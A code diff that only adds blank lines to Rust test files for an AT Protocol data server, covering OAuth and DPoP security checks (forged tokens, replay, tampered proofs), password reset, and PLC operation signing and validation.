+ 807 824 #[tokio::test] 808 825 async fn test_oauth_session_isolation_between_users() { 809 826 let url = base_url().await; ··· 878 895 assert_eq!(bob_posts.len(), 1); 879 896 assert_eq!(bob_posts[0]["value"]["text"], "Bob's different thoughts"); 880 897 } 898 + 881 899 #[tokio::test] 882 900 async fn test_oauth_token_works_with_sync_endpoints() { 883 901 let url = base_url().await;
+56
tests/oauth_security.rs
··· 12 12 use sha2::{Digest, Sha256}; 13 13 use wiremock::{Mock, MockServer, ResponseTemplate}; 14 14 use wiremock::matchers::{method, path}; 15 + 15 16 fn no_redirect_client() -> reqwest::Client { 16 17 reqwest::Client::builder() 17 18 .redirect(redirect::Policy::none()) 18 19 .build() 19 20 .unwrap() 20 21 } 22 + 21 23 fn generate_pkce() -> (String, String) { 22 24 let verifier_bytes: [u8; 32] = rand::random(); 23 25 let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes); ··· 27 29 let code_challenge = URL_SAFE_NO_PAD.encode(&hash); 28 30 (code_verifier, code_challenge) 29 31 } 32 + 30 33 async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer { 31 34 let mock_server = MockServer::start().await; 32 35 let client_id = mock_server.uri(); ··· 46 49 .await; 47 50 mock_server 48 51 } 52 + 49 53 async fn get_oauth_tokens( 50 54 http_client: &reqwest::Client, 51 55 url: &str, ··· 117 121 let refresh_token = token_body["refresh_token"].as_str().unwrap().to_string(); 118 122 (access_token, refresh_token, client_id) 119 123 } 124 + 120 125 #[tokio::test] 121 126 async fn test_security_forged_token_signature_rejected() { 122 127 let url = base_url().await; ··· 134 139 .unwrap(); 135 140 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged signature should be rejected"); 136 141 } 142 + 137 143 #[tokio::test] 138 144 async fn test_security_modified_payload_rejected() { 139 145 let url = base_url().await; ··· 153 159 .unwrap(); 154 160 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Modified payload should be rejected"); 155 161 } 162 + 156 163 #[tokio::test] 157 164 async fn test_security_algorithm_none_attack_rejected() { 158 165 let url = base_url().await; ··· 181 188 .unwrap(); 182 189 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm 'none' attack should be rejected"); 183 190 } 191 + 184 192 #[tokio::test] 185 193 async fn test_security_algorithm_substitution_attack_rejected() { 186 194 let url = base_url().await; ··· 209 217 .unwrap(); 210 218 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm substitution attack should be rejected"); 211 219 } 220 + 212 221 #[tokio::test] 213 222 async fn test_security_expired_token_rejected() { 214 223 let url = base_url().await; ··· 237 246 .unwrap(); 238 247 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Expired token should be rejected"); 239 248 } 249 + 240 250 #[tokio::test] 241 251 async fn test_security_pkce_plain_method_rejected() { 242 252 let url = base_url().await; ··· 264 274 "Error should mention S256 requirement" 265 275 ); 266 276 } 277 + 267 278 #[tokio::test] 268 279 async fn test_security_pkce_missing_challenge_rejected() { 269 280 let url = base_url().await; ··· 283 294 .unwrap(); 284 295 assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Missing PKCE challenge should be rejected"); 285 296 } 297 + 286 298 #[tokio::test] 287 299 async fn test_security_pkce_wrong_verifier_rejected() { 288 300 let url = base_url().await; ··· 352 364 let body: Value = token_res.json().await.unwrap(); 353 365 assert_eq!(body["error"], "invalid_grant"); 354 366 } 367 + 355 368 #[tokio::test] 356 369 async fn test_security_authorization_code_replay_attack() { 357 370 let url = base_url().await; ··· 434 447 let body: Value = replay_res.json().await.unwrap(); 435 448 assert_eq!(body["error"], "invalid_grant"); 436 449 } 450 + 437 451 #[tokio::test] 438 452 async fn test_security_refresh_token_replay_attack() { 439 453 let url = base_url().await; ··· 550 564 "Token family should be revoked after replay detection" 551 565 ); 552 566 } 567 + 553 568 #[tokio::test] 554 569 async fn test_security_redirect_uri_manipulation() { 555 570 let url = base_url().await; ··· 573 588 .unwrap(); 574 589 assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Unregistered redirect_uri should be rejected"); 575 590 } 591 + 576 592 #[tokio::test] 577 593 async fn test_security_deactivated_account_blocked() { 578 594 let url = base_url().await; ··· 639 655 let body: Value = auth_res.json().await.unwrap(); 640 656 assert_eq!(body["error"], "access_denied"); 641 657 } 658 + 642 659 #[tokio::test] 643 660 async fn test_security_url_injection_in_state_parameter() { 644 661 let url = base_url().await; ··· 710 727 location 711 728 ); 712 729 } 730 + 713 731 #[tokio::test] 714 732 async fn test_security_cross_client_token_theft() { 715 733 let url = base_url().await; ··· 789 807 "Error should mention client_id mismatch" 790 808 ); 791 809 } 810 + 792 811 #[test] 793 812 fn test_security_dpop_nonce_tamper_detection() { 794 813 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 803 822 let result = verifier.validate_nonce(&tampered_nonce); 804 823 assert!(result.is_err(), "Tampered nonce should be rejected"); 805 824 } 825 + 806 826 #[test] 807 827 fn test_security_dpop_nonce_cross_server_rejected() { 808 828 let secret1 = b"server-1-secret-32-bytes-long!!!"; ··· 813 833 let result = verifier2.validate_nonce(&nonce_from_server1); 814 834 assert!(result.is_err(), "Nonce from different server should be rejected"); 815 835 } 836 + 816 837 #[test] 817 838 fn test_security_dpop_proof_signature_tampering() { 818 839 use p256::ecdsa::{SigningKey, Signature, signature::Signer}; ··· 851 872 let result = verifier.verify_proof(&tampered_proof, "POST", "https://example.com/token", None); 852 873 assert!(result.is_err(), "Tampered DPoP signature should be rejected"); 853 874 } 875 + 854 876 #[test] 855 877 fn test_security_dpop_proof_key_substitution() { 856 878 use p256::ecdsa::{SigningKey, Signature, signature::Signer}; ··· 888 910 let result = verifier.verify_proof(&mismatched_proof, "POST", "https://example.com/token", None); 889 911 assert!(result.is_err(), "DPoP proof with mismatched key should be rejected"); 890 912 } 913 + 891 914 #[test] 892 915 fn test_security_jwk_thumbprint_consistency() { 893 916 let jwk = DPoPJwk { ··· 905 928 assert_eq!(first, result, "Thumbprint should be deterministic, but iteration {} differs", i); 906 929 } 907 930 } 931 + 908 932 #[test] 909 933 fn test_security_dpop_iat_clock_skew_limits() { 910 934 use p256::ecdsa::{SigningKey, Signature, signature::Signer}; ··· 956 980 } 957 981 } 958 982 } 983 + 959 984 #[test] 960 985 fn test_security_dpop_method_case_insensitivity() { 961 986 use p256::ecdsa::{SigningKey, Signature, signature::Signer}; ··· 992 1017 let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 993 1018 assert!(result.is_ok(), "HTTP method comparison should be case-insensitive"); 994 1019 } 1020 + 995 1021 #[tokio::test] 996 1022 async fn test_security_invalid_grant_type_rejected() { 997 1023 let url = base_url().await; ··· 1024 1050 ); 1025 1051 } 1026 1052 } 1053 + 1027 1054 #[tokio::test] 1028 1055 async fn test_security_token_with_wrong_typ_rejected() { 1029 1056 let url = base_url().await; ··· 1066 1093 ); 1067 1094 } 1068 1095 } 1096 + 1069 1097 #[tokio::test] 1070 1098 async fn test_security_missing_required_claims_rejected() { 1071 1099 let url = base_url().await; ··· 1098 1126 ); 1099 1127 } 1100 1128 } 1129 + 1101 1130 #[tokio::test] 1102 1131 async fn test_security_malformed_tokens_rejected() { 1103 1132 let url = base_url().await; ··· 1130 1159 ); 1131 1160 } 1132 1161 } 1162 + 1133 1163 #[tokio::test] 1134 1164 async fn test_security_authorization_header_formats() { 1135 1165 let url = base_url().await; ··· 1175 1205 ); 1176 1206 } 1177 1207 } 1208 + 1178 1209 #[tokio::test] 1179 1210 async fn test_security_no_authorization_header() { 1180 1211 let url = base_url().await; ··· 1186 1217 .unwrap(); 1187 1218 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Missing auth header should return 401"); 1188 1219 } 1220 + 1189 1221 #[tokio::test] 1190 1222 async fn test_security_empty_authorization_header() { 1191 1223 let url = base_url().await; ··· 1198 1230 .unwrap(); 1199 1231 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Empty auth header should return 401"); 1200 1232 } 1233 + 1201 1234 #[tokio::test] 1202 1235 async fn test_security_revoked_token_rejected() { 1203 1236 let url = base_url().await; ··· 1219 1252 let introspect_body: Value = introspect_res.json().await.unwrap(); 1220 1253 assert_eq!(introspect_body["active"], false, "Revoked token should be inactive"); 1221 1254 } 1255 + 1222 1256 #[tokio::test] 1223 1257 #[ignore = "rate limiting is disabled in test environment"] 1224 1258 async fn test_security_oauth_authorize_rate_limiting() { ··· 1274 1308 rate_limited_count 1275 1309 ); 1276 1310 } 1311 + 1277 1312 fn create_dpop_proof( 1278 1313 method: &str, 1279 1314 uri: &str, ··· 1317 1352 let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes()); 1318 1353 format!("{}.{}", signing_input, signature_b64) 1319 1354 } 1355 + 1320 1356 #[test] 1321 1357 fn test_dpop_nonce_generation() { 1322 1358 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1326 1362 assert!(!nonce1.is_empty()); 1327 1363 assert!(!nonce2.is_empty()); 1328 1364 } 1365 + 1329 1366 #[test] 1330 1367 fn test_dpop_nonce_validation_success() { 1331 1368 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1334 1371 let result = verifier.validate_nonce(&nonce); 1335 1372 assert!(result.is_ok(), "Valid nonce should pass: {:?}", result); 1336 1373 } 1374 + 1337 1375 #[test] 1338 1376 fn test_dpop_nonce_wrong_secret() { 1339 1377 let secret1 = b"test-dpop-secret-32-bytes-long!!"; ··· 1344 1382 let result = verifier2.validate_nonce(&nonce); 1345 1383 assert!(result.is_err(), "Nonce from different secret should fail"); 1346 1384 } 1385 + 1347 1386 #[test] 1348 1387 fn test_dpop_nonce_invalid_format() { 1349 1388 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1352 1391 assert!(verifier.validate_nonce("").is_err()); 1353 1392 assert!(verifier.validate_nonce("!!!not-base64!!!").is_err()); 1354 1393 } 1394 + 1355 1395 #[test] 1356 1396 fn test_jwk_thumbprint_ec_p256() { 1357 1397 let jwk = DPoPJwk { ··· 1366 1406 assert!(!tp.is_empty()); 1367 1407 assert!(tp.chars().all(|c| c.is_alphanumeric() || c == '-' || c == '_')); 1368 1408 } 1409 + 1369 1410 #[test] 1370 1411 fn test_jwk_thumbprint_ec_secp256k1() { 1371 1412 let jwk = DPoPJwk { ··· 1377 1418 let thumbprint = compute_jwk_thumbprint(&jwk); 1378 1419 assert!(thumbprint.is_ok()); 1379 1420 } 1421 + 1380 1422 #[test] 1381 1423 fn test_jwk_thumbprint_okp_ed25519() { 1382 1424 let jwk = DPoPJwk { ··· 1388 1430 let thumbprint = compute_jwk_thumbprint(&jwk); 1389 1431 assert!(thumbprint.is_ok()); 1390 1432 } 1433 + 1391 1434 #[test] 1392 1435 fn test_jwk_thumbprint_missing_crv() { 1393 1436 let jwk = DPoPJwk { ··· 1399 1442 let thumbprint = compute_jwk_thumbprint(&jwk); 1400 1443 assert!(thumbprint.is_err()); 1401 1444 } 1445 + 1402 1446 #[test] 1403 1447 fn test_jwk_thumbprint_missing_x() { 1404 1448 let jwk = DPoPJwk { ··· 1410 1454 let thumbprint = compute_jwk_thumbprint(&jwk); 1411 1455 assert!(thumbprint.is_err()); 1412 1456 } 1457 + 1413 1458 #[test] 1414 1459 fn test_jwk_thumbprint_missing_y_for_ec() { 1415 1460 let jwk = DPoPJwk { ··· 1421 1466 let thumbprint = compute_jwk_thumbprint(&jwk); 1422 1467 assert!(thumbprint.is_err()); 1423 1468 } 1469 + 1424 1470 #[test] 1425 1471 fn test_jwk_thumbprint_unsupported_key_type() { 1426 1472 let jwk = DPoPJwk { ··· 1432 1478 let thumbprint = compute_jwk_thumbprint(&jwk); 1433 1479 assert!(thumbprint.is_err()); 1434 1480 } 1481 + 1435 1482 #[test] 1436 1483 fn test_jwk_thumbprint_deterministic() { 1437 1484 let jwk = DPoPJwk { ··· 1444 1491 let tp2 = compute_jwk_thumbprint(&jwk).unwrap(); 1445 1492 assert_eq!(tp1, tp2, "Thumbprint should be deterministic"); 1446 1493 } 1494 + 1447 1495 #[test] 1448 1496 fn test_dpop_proof_invalid_format() { 1449 1497 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1453 1501 let result = verifier.verify_proof("invalid", "POST", "https://example.com", None); 1454 1502 assert!(result.is_err()); 1455 1503 } 1504 + 1456 1505 #[test] 1457 1506 fn test_dpop_proof_invalid_typ() { 1458 1507 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1479 1528 let result = verifier.verify_proof(&proof, "POST", "https://example.com", None); 1480 1529 assert!(result.is_err()); 1481 1530 } 1531 + 1482 1532 #[test] 1483 1533 fn test_dpop_proof_method_mismatch() { 1484 1534 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1487 1537 let result = verifier.verify_proof(&proof, "GET", "https://example.com/token", None); 1488 1538 assert!(result.is_err()); 1489 1539 } 1540 + 1490 1541 #[test] 1491 1542 fn test_dpop_proof_uri_mismatch() { 1492 1543 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1495 1546 let result = verifier.verify_proof(&proof, "POST", "https://other.com/token", None); 1496 1547 assert!(result.is_err()); 1497 1548 } 1549 + 1498 1550 #[test] 1499 1551 fn test_dpop_proof_iat_too_old() { 1500 1552 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1503 1555 let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 1504 1556 assert!(result.is_err()); 1505 1557 } 1558 + 1506 1559 #[test] 1507 1560 fn test_dpop_proof_iat_future() { 1508 1561 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1511 1564 let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 1512 1565 assert!(result.is_err()); 1513 1566 } 1567 + 1514 1568 #[test] 1515 1569 fn test_dpop_proof_ath_mismatch() { 1516 1570 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1530 1584 ); 1531 1585 assert!(result.is_err()); 1532 1586 } 1587 + 1533 1588 #[test] 1534 1589 fn test_dpop_proof_missing_ath_when_required() { 1535 1590 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1543 1598 ); 1544 1599 assert!(result.is_err()); 1545 1600 } 1601 + 1546 1602 #[test] 1547 1603 fn test_dpop_proof_uri_ignores_query_params() { 1548 1604 let secret = b"test-dpop-secret-32-bytes-long!!";
+9
tests/password_reset.rs
··· 4 4 use serde_json::{json, Value}; 5 5 use sqlx::PgPool; 6 6 use helpers::verify_new_account; 7 + 7 8 async fn get_pool() -> PgPool { 8 9 let conn_str = common::get_db_connection_string().await; 9 10 sqlx::postgres::PgPoolOptions::new() ··· 12 13 .await 13 14 .expect("Failed to connect to test database") 14 15 } 16 + 15 17 #[tokio::test] 16 18 async fn test_request_password_reset_creates_code() { 17 19 let client = common::client(); ··· 51 53 assert!(code.contains('-')); 52 54 assert_eq!(code.len(), 11); 53 55 } 56 + 54 57 #[tokio::test] 55 58 async fn test_request_password_reset_unknown_email_returns_ok() { 56 59 let client = common::client(); ··· 63 66 .expect("Failed to request password reset"); 64 67 assert_eq!(res.status(), StatusCode::OK); 65 68 } 69 + 66 70 #[tokio::test] 67 71 async fn test_reset_password_with_valid_token() { 68 72 let client = common::client(); ··· 142 146 .expect("Failed to login attempt"); 143 147 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 144 148 } 149 + 145 150 #[tokio::test] 146 151 async fn test_reset_password_with_invalid_token() { 147 152 let client = common::client(); ··· 159 164 let body: Value = res.json().await.expect("Invalid JSON"); 160 165 assert_eq!(body["error"], "InvalidToken"); 161 166 } 167 + 162 168 #[tokio::test] 163 169 async fn test_reset_password_with_expired_token() { 164 170 let client = common::client(); ··· 213 219 let body: Value = res.json().await.expect("Invalid JSON"); 214 220 assert_eq!(body["error"], "ExpiredToken"); 215 221 } 222 + 216 223 #[tokio::test] 217 224 async fn test_reset_password_invalidates_sessions() { 218 225 let client = common::client(); ··· 275 282 .expect("Failed to get session"); 276 283 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 277 284 } 285 + 278 286 #[tokio::test] 279 287 async fn test_request_password_reset_empty_email() { 280 288 let client = common::client(); ··· 289 297 let body: Value = res.json().await.expect("Invalid JSON"); 290 298 assert_eq!(body["error"], "InvalidRequest"); 291 299 } 300 + 292 301 #[tokio::test] 293 302 async fn test_reset_password_creates_notification() { 294 303 let pool = get_pool().await;
+20
tests/plc_migration.rs
··· 6 6 use sqlx::PgPool; 7 7 use wiremock::matchers::{method, path}; 8 8 use wiremock::{Mock, MockServer, ResponseTemplate}; 9 + 9 10 fn encode_uvarint(mut x: u64) -> Vec<u8> { 10 11 let mut out = Vec::new(); 11 12 while x >= 0x80 { ··· 15 16 out.push(x as u8); 16 17 out 17 18 } 19 + 18 20 fn signing_key_to_did_key(signing_key: &SigningKey) -> String { 19 21 let verifying_key = signing_key.verifying_key(); 20 22 let point = verifying_key.to_encoded_point(true); ··· 24 26 let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed); 25 27 format!("did:key:{}", encoded) 26 28 } 29 + 27 30 fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String { 28 31 let public_key = signing_key.verifying_key(); 29 32 let compressed = public_key.to_sec1_bytes(); ··· 31 34 buf.extend_from_slice(&compressed); 32 35 multibase::encode(multibase::Base::Base58Btc, buf) 33 36 } 37 + 34 38 async fn get_user_signing_key(did: &str) -> Option<Vec<u8>> { 35 39 let db_url = get_db_connection_string().await; 36 40 let pool = PgPool::connect(&db_url).await.ok()?; ··· 48 52 .ok()??; 49 53 bspds::config::decrypt_key(&row.key_bytes, row.encryption_version).ok() 50 54 } 55 + 51 56 async fn get_plc_token_from_db(did: &str) -> Option<String> { 52 57 let db_url = get_db_connection_string().await; 53 58 let pool = PgPool::connect(&db_url).await.ok()?; ··· 64 69 .await 65 70 .ok()? 66 71 } 72 + 67 73 async fn get_user_handle(did: &str) -> Option<String> { 68 74 let db_url = get_db_connection_string().await; 69 75 let pool = PgPool::connect(&db_url).await.ok()?; ··· 75 81 .await 76 82 .ok()? 77 83 } 84 + 78 85 fn create_mock_last_op( 79 86 _did: &str, 80 87 handle: &str, ··· 99 106 "sig": "mock_signature_for_testing" 100 107 }) 101 108 } 109 + 102 110 fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> Value { 103 111 let multikey = get_multikey_from_signing_key(signing_key); 104 112 json!({ ··· 121 129 }] 122 130 }) 123 131 } 132 + 124 133 async fn setup_mock_plc_for_sign( 125 134 did: &str, 126 135 handle: &str, ··· 137 146 .await; 138 147 mock_server 139 148 } 149 + 140 150 async fn setup_mock_plc_for_submit( 141 151 did: &str, 142 152 handle: &str, ··· 158 168 .await; 159 169 mock_server 160 170 } 171 + 161 172 #[tokio::test] 162 173 #[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"] 163 174 async fn test_full_plc_operation_flow() { ··· 213 224 assert_eq!(operation.get("type").and_then(|v| v.as_str()), Some("plc_operation")); 214 225 assert!(operation.get("prev").is_some(), "Operation should have prev reference"); 215 226 } 227 + 216 228 #[tokio::test] 217 229 #[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_consumes_token -- --ignored --test-threads=1"] 218 230 async fn test_sign_plc_operation_consumes_token() { ··· 278 290 "Error should indicate invalid/expired token" 279 291 ); 280 292 } 293 + 281 294 #[tokio::test] 282 295 async fn test_sign_plc_operation_with_custom_fields() { 283 296 let client = client(); ··· 337 350 assert_eq!(also_known_as.unwrap().len(), 2, "Should have 2 aliases"); 338 351 assert_eq!(rotation_keys.unwrap().len(), 2, "Should have 2 rotation keys"); 339 352 } 353 + 340 354 #[tokio::test] 341 355 #[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"] 342 356 async fn test_submit_plc_operation_success() { ··· 390 404 submit_body 391 405 ); 392 406 } 407 + 393 408 #[tokio::test] 394 409 async fn test_submit_plc_operation_wrong_endpoint_rejected() { 395 410 let client = client(); ··· 441 456 let body: Value = submit_res.json().await.unwrap(); 442 457 assert_eq!(body["error"], "InvalidRequest"); 443 458 } 459 + 444 460 #[tokio::test] 445 461 async fn test_submit_plc_operation_wrong_signing_key_rejected() { 446 462 let client = client(); ··· 494 510 let body: Value = submit_res.json().await.unwrap(); 495 511 assert_eq!(body["error"], "InvalidRequest"); 496 512 } 513 + 497 514 #[tokio::test] 498 515 async fn test_full_sign_and_submit_flow() { 499 516 let client = client(); ··· 593 610 submit_body 594 611 ); 595 612 } 613 + 596 614 #[tokio::test] 597 615 async fn test_cross_pds_migration_with_records() { 598 616 let client = client(); ··· 692 710 "Record content should match" 693 711 ); 694 712 } 713 + 695 714 #[tokio::test] 696 715 async fn test_migration_rejects_wrong_did_document() { 697 716 let client = client(); ··· 749 768 "Error should mention signature verification failure" 750 769 ); 751 770 } 771 + 752 772 #[tokio::test] 753 773 #[ignore = "requires exclusive env var access; run with: cargo test test_full_migration_flow_end_to_end -- --ignored --test-threads=1"] 754 774 async fn test_full_migration_flow_end_to_end() {
+15
tests/plc_operations.rs
··· 3 3 use reqwest::StatusCode; 4 4 use serde_json::json; 5 5 use sqlx::PgPool; 6 + 6 7 #[tokio::test] 7 8 async fn test_request_plc_operation_signature_requires_auth() { 8 9 let client = client(); ··· 16 17 .expect("Request failed"); 17 18 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 18 19 } 20 + 19 21 #[tokio::test] 20 22 async fn test_request_plc_operation_signature_success() { 21 23 let client = client(); ··· 31 33 .expect("Request failed"); 32 34 assert_eq!(res.status(), StatusCode::OK); 33 35 } 36 + 34 37 #[tokio::test] 35 38 async fn test_sign_plc_operation_requires_auth() { 36 39 let client = client(); ··· 45 48 .expect("Request failed"); 46 49 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 47 50 } 51 + 48 52 #[tokio::test] 49 53 async fn test_sign_plc_operation_requires_token() { 50 54 let client = client(); ··· 63 67 let body: serde_json::Value = res.json().await.unwrap(); 64 68 assert_eq!(body["error"], "InvalidRequest"); 65 69 } 70 + 66 71 #[tokio::test] 67 72 async fn test_sign_plc_operation_invalid_token() { 68 73 let client = client(); ··· 83 88 let body: serde_json::Value = res.json().await.unwrap(); 84 89 assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken"); 85 90 } 91 + 86 92 #[tokio::test] 87 93 async fn test_submit_plc_operation_requires_auth() { 88 94 let client = client(); ··· 99 105 .expect("Request failed"); 100 106 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 101 107 } 108 + 102 109 #[tokio::test] 103 110 async fn test_submit_plc_operation_invalid_operation() { 104 111 let client = client(); ··· 121 128 let body: serde_json::Value = res.json().await.unwrap(); 122 129 assert_eq!(body["error"], "InvalidRequest"); 123 130 } 131 + 124 132 #[tokio::test] 125 133 async fn test_submit_plc_operation_missing_sig() { 126 134 let client = client(); ··· 148 156 let body: serde_json::Value = res.json().await.unwrap(); 149 157 assert_eq!(body["error"], "InvalidRequest"); 150 158 } 159 + 151 160 #[tokio::test] 152 161 async fn test_submit_plc_operation_wrong_service_endpoint() { 153 162 let client = client(); ··· 179 188 .expect("Request failed"); 180 189 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 181 190 } 191 + 182 192 #[tokio::test] 183 193 async fn test_request_plc_operation_creates_token_in_db() { 184 194 let client = client(); ··· 213 223 assert!(row.token.contains('-'), "Token should contain hyphen"); 214 224 assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired"); 215 225 } 226 + 216 227 #[tokio::test] 217 228 async fn test_request_plc_operation_replaces_existing_token() { 218 229 let client = client(); ··· 278 289 .expect("Count query failed"); 279 290 assert_eq!(count, 1, "Should only have one token per user"); 280 291 } 292 + 281 293 #[tokio::test] 282 294 async fn test_submit_plc_operation_wrong_verification_method() { 283 295 let client = client(); ··· 321 333 body 322 334 ); 323 335 } 336 + 324 337 #[tokio::test] 325 338 async fn test_submit_plc_operation_wrong_handle() { 326 339 let client = client(); ··· 357 370 let body: serde_json::Value = res.json().await.unwrap(); 358 371 assert_eq!(body["error"], "InvalidRequest"); 359 372 } 373 + 360 374 #[tokio::test] 361 375 async fn test_submit_plc_operation_wrong_service_type() { 362 376 let client = client(); ··· 393 407 let body: serde_json::Value = res.json().await.unwrap(); 394 408 assert_eq!(body["error"], "InvalidRequest"); 395 409 } 410 + 396 411 #[tokio::test] 397 412 async fn test_plc_token_expiry_format() { 398 413 let client = client();
+29
tests/plc_validation.rs
··· 7 7 use k256::ecdsa::SigningKey; 8 8 use serde_json::json; 9 9 use std::collections::HashMap; 10 + 10 11 fn create_valid_operation() -> serde_json::Value { 11 12 let key = SigningKey::random(&mut rand::thread_rng()); 12 13 let did_key = signing_key_to_did_key(&key); ··· 27 28 }); 28 29 sign_operation(&op, &key).unwrap() 29 30 } 31 + 30 32 #[test] 31 33 fn test_validate_plc_operation_valid() { 32 34 let op = create_valid_operation(); 33 35 let result = validate_plc_operation(&op); 34 36 assert!(result.is_ok()); 35 37 } 38 + 36 39 #[test] 37 40 fn test_validate_plc_operation_missing_type() { 38 41 let op = json!({ ··· 45 48 let result = validate_plc_operation(&op); 46 49 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type"))); 47 50 } 51 + 48 52 #[test] 49 53 fn test_validate_plc_operation_invalid_type() { 50 54 let op = json!({ ··· 54 58 let result = validate_plc_operation(&op); 55 59 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type"))); 56 60 } 61 + 57 62 #[test] 58 63 fn test_validate_plc_operation_missing_sig() { 59 64 let op = json!({ ··· 66 71 let result = validate_plc_operation(&op); 67 72 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig"))); 68 73 } 74 + 69 75 #[test] 70 76 fn test_validate_plc_operation_missing_rotation_keys() { 71 77 let op = json!({ ··· 78 84 let result = validate_plc_operation(&op); 79 85 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys"))); 80 86 } 87 + 81 88 #[test] 82 89 fn test_validate_plc_operation_missing_verification_methods() { 83 90 let op = json!({ ··· 90 97 let result = validate_plc_operation(&op); 91 98 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods"))); 92 99 } 100 + 93 101 #[test] 94 102 fn test_validate_plc_operation_missing_also_known_as() { 95 103 let op = json!({ ··· 102 110 let result = validate_plc_operation(&op); 103 111 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs"))); 104 112 } 113 + 105 114 #[test] 106 115 fn test_validate_plc_operation_missing_services() { 107 116 let op = json!({ ··· 114 123 let result = validate_plc_operation(&op); 115 124 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services"))); 116 125 } 126 + 117 127 #[test] 118 128 fn test_validate_rotation_key_required() { 119 129 let key = SigningKey::random(&mut rand::thread_rng()); ··· 141 151 let result = validate_plc_operation_for_submission(&op, &ctx); 142 152 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key"))); 143 153 } 154 + 144 155 #[test] 145 156 fn test_validate_signing_key_match() { 146 157 let key = SigningKey::random(&mut rand::thread_rng()); ··· 168 179 let result = validate_plc_operation_for_submission(&op, &ctx); 169 180 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key"))); 170 181 } 182 + 171 183 #[test] 172 184 fn test_validate_handle_match() { 173 185 let key = SigningKey::random(&mut rand::thread_rng()); ··· 194 206 let result = validate_plc_operation_for_submission(&op, &ctx); 195 207 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle"))); 196 208 } 209 + 197 210 #[test] 198 211 fn test_validate_pds_service_type() { 199 212 let key = SigningKey::random(&mut rand::thread_rng()); ··· 220 233 let result = validate_plc_operation_for_submission(&op, &ctx); 221 234 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type"))); 222 235 } 236 + 223 237 #[test] 224 238 fn test_validate_pds_endpoint_match() { 225 239 let key = SigningKey::random(&mut rand::thread_rng()); ··· 246 260 let result = validate_plc_operation_for_submission(&op, &ctx); 247 261 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint"))); 248 262 } 263 + 249 264 #[test] 250 265 fn test_verify_signature_secp256k1() { 251 266 let key = SigningKey::random(&mut rand::thread_rng()); ··· 264 279 assert!(result.is_ok()); 265 280 assert!(result.unwrap()); 266 281 } 282 + 267 283 #[test] 268 284 fn test_verify_signature_wrong_key() { 269 285 let key = SigningKey::random(&mut rand::thread_rng()); ··· 283 299 assert!(result.is_ok()); 284 300 assert!(!result.unwrap()); 285 301 } 302 + 286 303 #[test] 287 304 fn test_verify_signature_invalid_did_key_format() { 288 305 let key = SigningKey::random(&mut rand::thread_rng()); ··· 300 317 assert!(result.is_ok()); 301 318 assert!(!result.unwrap()); 302 319 } 320 + 303 321 #[test] 304 322 fn test_tombstone_validation() { 305 323 let op = json!({ ··· 310 328 let result = validate_plc_operation(&op); 311 329 assert!(result.is_ok()); 312 330 } 331 + 313 332 #[test] 314 333 fn test_cid_for_cbor_deterministic() { 315 334 let value = json!({ ··· 321 340 assert_eq!(cid1, cid2, "CID generation should be deterministic"); 322 341 assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)"); 323 342 } 343 + 324 344 #[test] 325 345 fn test_cid_different_for_different_data() { 326 346 let value1 = json!({"data": 1}); ··· 329 349 let cid2 = cid_for_cbor(&value2).unwrap(); 330 350 assert_ne!(cid1, cid2, "Different data should produce different CIDs"); 331 351 } 352 + 332 353 #[test] 333 354 fn test_signing_key_to_did_key_format() { 334 355 let key = SigningKey::random(&mut rand::thread_rng()); ··· 336 357 